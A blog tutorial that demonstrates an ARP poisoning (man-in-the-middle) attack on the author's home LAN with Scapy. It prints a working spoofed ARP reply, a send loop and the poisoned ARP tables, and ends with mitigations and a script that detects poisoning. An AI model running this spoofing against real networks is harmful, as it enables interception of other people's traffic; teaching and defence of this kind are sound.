Perform an ARP Poisoning Attack Using Scapy

by: George El., November 2019, Reading time: 3 minutes

In this post I will show you how to perform an ARP poisoning attack on a local network using a Python package called Scapy. Scapy allows us to craft our own packets, specifying all layers from layer 2 to layer 7.

In my local network I have two PCs, with addresses 192.168.1.73 and 192.168.1.78, respectively. The ADSL router has IP 192.168.1.254 and is the gateway (gw) of the two PCs.

My goal is to ARP poison PC 192.168.1.78 so that it sends its packets to PC 192.168.1.73 instead of the gateway 192.168.1.254.

Let's see the ARP table of 192.168.1.78:

arp -a

Interface: 192.168.1.78 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.73          fc-aa-14-01-cd-41     dynamic
  192.168.1.254         00-1f-9f-ce-d3-94     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.251           01-00-5e-00-00-fb     static
  224.0.0.252           01-00-5e-00-00-fc     static
  239.255.255.250       01-00-5e-7f-ff-fa     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static

Now I will create an ARP reply packet and send it from 192.168.1.73 to 192.168.1.78. If you don't have Scapy installed, do a pip install scapy, and run scapy. You will get a >>> prompt. There you can write Python code.

(base) D:\NetEng>pip install scapy
Requirement already satisfied: scapy in d:\anaconda3\lib\site-packages (2.4.3)

(base) D:\NetEng>scapy
                                      
                     aSPY//YASa       
             apyyyyCY//////////YCa       |
            sY//////YSpcs  scpCY//Pp     | Welcome to Scapy
 ayp ayyyyyyySCP//Pp           syY//C    | Version 2.4.3
 AYAsAYYYYYYYY///Ps              cY//S   |
         pCCCCY//p          cSSps y//Y   | https://github.com/secdev/scapy
         SPPPP///a          pP///AC//Y   |
              A//A            cyP////C   | Have fun!
              p///Ac            sC///a   |
              P////YCpc           A//A   | Wanna support scapy? Rate it on
       scccccp///pSP///p          p//Y   | sectools!
      sY/////////y  caa           S//P   | http://sectools.org/tool/scapy/
       cayCyayP//Ya              pY/Ya   |             -- Satoshi Nakamoto
        sY/PsY////YCc          aC//Yp    |
         sc  sccaCY//PCypaapyCP//YSs  
                  spCPY//////YPSps    
                       ccaacs         
                                       using IPython 6.5.0
>>> 

Then you can write Python code:

>>> arpspoofed = ARP(op=2, psrc="192.168.1.254", pdst="192.168.1.78",
                        hwdst="FC:AA:14:01:CD:41")

>>> arpspoofed.show()
###[ ARP ]###
  hwtype= 0x1
  ptype= IPv4
  hwlen= None
  plen= None
  op= is-at
  hwsrc= fc:aa:14:01:cd:41
  psrc= 192.168.1.254
  hwdst= FC:AA:14:01:CD:41
  pdst= 192.168.1.78

>>> while(True):
...:    send(arpspoofed)

Let's check the ARP table of 192.168.1.78 again:

(base) C:\Users\User>arp -a

Interface: 192.168.1.78 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.73          fc-aa-14-01-cd-41     dynamic
  192.168.1.254         fc-aa-14-01-cd-41     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.251           01-00-5e-00-00-fb     static
  224.0.0.252           01-00-5e-00-00-fc     static
  239.255.255.250       01-00-5e-7f-ff-fa     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static

You can see now that the target PC believes that 192.168.1.254 has the hardware address of 192.168.1.73. From now on it will send all packets destined for 192.168.1.254 to 192.168.1.73.

So you can see that performing an ARP poisoning or Man in the Middle attack is very easy. Of course there are ready-made tools that can automate all this stuff for you, but I wanted to show you how to do it yourself.

In order to avoid this kind of attack you have to apply DHCP snooping and ARP inspection on your local network. Please check my post on how to do this: Configuring dhcp snooping and arp inspection.
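On the host side, the poisoned table shown above has a recognisable signature: the gateway's MAC changes and one MAC is suddenly claimed by two IPs. The following is an added example, not code from the original post, that parses Windows `arp -a` output and flags both conditions; the function names are hypothetical and the sample tables are constructed from the listings in this post.

```python
import re
from collections import defaultdict

# Constructed sample: the "before" arp -a listing from this post (shortened).
BEFORE = """\
Interface: 192.168.1.78 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.73          fc-aa-14-01-cd-41     dynamic
  192.168.1.254         00-1f-9f-ce-d3-94     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
"""
# Constructed sample: the "after" listing, where the gateway entry was overwritten.
AFTER = BEFORE.replace("00-1f-9f-ce-d3-94", "fc-aa-14-01-cd-41")

ENTRY = re.compile(
    r"^\s*(\d+\.\d+\.\d+\.\d+)\s+((?:[0-9a-f]{2}-){5}[0-9a-f]{2})\s+(\w+)\s*$", re.I)

def parse_arp_table(text):
    """Return {ip: mac} for the dynamic entries of Windows `arp -a` output."""
    table = {}
    for line in text.splitlines():
        m = ENTRY.match(line)
        # Static broadcast/multicast rows are skipped; only learned entries matter.
        if m and m.group(3).lower() == "dynamic":
            table[m.group(1)] = m.group(2).lower()
    return table

def find_poisoning(baseline, current, gateway):
    """Report a changed gateway MAC and any MAC claimed by more than one IP."""
    findings = []
    if gateway in baseline and current.get(gateway) not in (None, baseline[gateway]):
        findings.append(
            f"gateway {gateway} moved {baseline[gateway]} -> {current[gateway]}")
    owners = defaultdict(list)
    for ip, mac in current.items():
        owners[mac].append(ip)
    for mac, ips in owners.items():
        if len(ips) > 1:
            findings.append(f"{mac} claimed by {', '.join(sorted(ips))}")
    return findings

if __name__ == "__main__":
    base, cur = parse_arp_table(BEFORE), parse_arp_table(AFTER)
    for finding in find_poisoning(base, cur, "192.168.1.254"):
        print("ALERT:", finding)
```

A MAC shared by several IPs can also be legitimate (proxy ARP, a host with multiple addresses), so treat that finding as a lead to confirm against a known-good baseline rather than as proof.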
